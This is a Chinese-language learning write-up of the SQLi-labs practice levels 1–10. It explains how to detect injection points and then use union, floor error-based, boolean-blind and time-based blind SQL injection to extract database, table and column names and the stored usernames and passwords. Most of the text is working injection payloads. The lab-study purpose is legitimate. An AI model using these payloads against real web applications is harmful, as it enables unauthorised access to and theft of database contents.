学习过程中的简单总结

用联合查询有回显

首先是and判断和or判断(or跟and判断方法不一样的，and是提交返回错误才有注入点，而or是提交返回正确有注入点)

?id=1'and 1=1如果前面是对的后面条件永远都是真的，会返回正常页

而?id=1' or 1=1恒为真

?id=1'and 1=2报错或者未显示数据 说明存在注入漏洞

加减号数字判断(返回的页面和前面的页面相同，加上-1，返回错误页面，则也表示存在注入漏洞)   /?id=10-1

Less-1

?id=1' 页面不正常,可能是sql字符注入,此时在后面加上--+注释掉语句

Less-2       

?id=1'--+ 错误  ?id=1')--+错误  判断为整型注入,可直接用/?id=1--+注入

Less-3     

?id=1'--+ 错误  ?id=1')--+ 页面正常，判断出为 ')闭合, 用 ')和--+注释来进行注入，页面显示正常说明sql语句为id='$id'(基于单引号闭合的字符型注入)

Less-4

同理用'')和--+注释来进行注入(基于双引号闭合的字符型注入）   

以上都是找注入点

找到注入点后开始注入：

利用order by来获得列数(例:发现?id=1' order by 3--+页面正常，/?id=1' order by 4--+页面报错，所以有三列）

将id改为一个数据库不存在的id值,使用union select 1,2,3联合查询语句查看页面是否有显示位,发现页面先输出了2和3，说明页面有2个显示位

然后利用sql查询语句依次爆出数据库内的数据库名，表名，列名，字段信息

爆库（查询所有数据库）?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

爆表（查询出security数据库中所有的数据表名）?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

爆列（查询security数据库中的users数据表中的列名）?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+

爆字段（查询users数据表的数据即里面所有的用户名和密码）?id=0' union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+

group_concat函数:将group by产生的同一个分组中的值连接起来，返回一个字符串结果

用联合查询无回显（用盲注）

(这种情况下id值需是存在的值）

Less-5

输入 ?id=2' 查看是否有注入   然后用order by查看列   这里就要用到新的注入方法了：

报错注入

的一种“floor报错注入”，其语句为 and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a) payload即我们要输入的sql查询语句  该语句输出字符长度限制为64个字符

?id=2' and (select 1 from (select count(*),concat(((select group_concat(schema_name) from information_schema.schemata)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

这里发现页面提示输出信息超过一行，但我们已经使用了group_concat函数，说明这里数据库名组成的字符串长度超过了64位，所以我们需要放弃group_concat函数使用limit 0,1来一个个输出group_concat()函数的作用

第一位0表示id从几开始（0是id为1，依次相加），第二位1表示一次输出几列（1表示输出一个，2就表示输出两个）

例：limit 0,2 是id为1和2的两列数据； limit 3,1 是id为4的第一列数据

接着我们运用如下语句：and (select 1 from (select count(*),concat(((select schema_name from information_schema.schemata limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

在输出信息之后页面会额外输出一个1,这个1是floor报错语句中输出的一部分（无论输出什么结果，都会有这个1） 接着更改payload，一个个的查询我们要找的数据即可     

布尔盲注

正确和错误时页面的回显不同，和报错型payload核心部分的构造相同  并且此方法要熟知或参考ASCII值   

substr()函数:是VFP字符函数的一种，表示的是字符型函数，格式是：substr(<字符表达式>、<数值表达式1>[,<数值表达式2>]（a,b,c)

其中，"字符表达式"是指定要从其中返回字符串的字符表达式或备注字段；"数值表达式1"用于指定返回的字符串在字符表达式或备注字段中的位置，"数值表达式2"用于指定返回的字符数目，缺省时返回字符表达式的值结束前的全部字符

例：store'abcdefghijklm' to mystring，substr(mystring ,0,5) 显示 "abcde";

?id=1' and (ascii(substr((select database()),1,1)))=115 --+)此步是判断数据库首位是否为's'对应的ASCII值115，然后改变（,b,）的b值和等号后面的值如?id=1' and (ascii(substr((select database()) ,2,1)))=101 --+可得数据库名为security

或改变payload用二分法一步一步猜解ASCII值得所求数据对应字符串大于小于或等于均可?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1))<100--+

先判断表长后再进行盲注?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1)))=5 --+

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))<150--+

?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1))>100--+

?id=1' and ascii(substr((select username from security.users limit 0,1)1,1))>1--+

Less-6

与第5关类似，只不过这一关使用的是""的方式闭合字符串,只需要将?id=2' 改为 ?id=2"即可,其余过程请参考第五关 

Less-8

?id=2' --+ 页面回显正常，不再说了，是单引号字符型注入

所以就尝试了下布尔盲注是可以的，过程请参考第五关

Less-9

时间延迟型盲注

正确会延迟，错误没有延迟 发现明显延迟，说明猜测正确

时间延迟型和报错型payload核心部分的构造相同

left(,n)函数：函数执行成功时返回字符串从左起的n个字符，发生错误时返回空字符串（""），为空则返回NULL。如果n的值大于字符串的长度，那么将返回整个字符串，但并不增加其它字符。

if函数：if(条件，A，B)如果条件为 true，执行A，否则执行B

爆库长?id=1' and if(length(database())=8,sleep(3),1)--+  明显延迟，所以数据库长度为8

爆库名?id=1' and if(left(database(),1)='s',sleep(3),1)--+明显延迟，所以数据库第一个字符为s，接下来依次增加(left(database(),字符长度)中的字符长度，等号右边字符串也依次爆破下一个字符，正确匹配时会延迟。最终爆破得到left(database(),8)='security'

爆表名?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' ,sleep(3),1)--+

修改limit x,1 可以遍历表名，终于在limit 3,1 爆破出表名为users并猜测它存放username和password.

爆列名?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(3),1)--+

修改limit x,1 中的x来遍历列名查询password是否存在表中，在limit 5,1的时候查到了password列，同样的方法查询username，接下来爆破字段的值。

爆破值

?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(3),1)--+

?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(3),1)--+

Less-10

是基于双引号的时间盲注

与第九关几乎无差  过程不再重复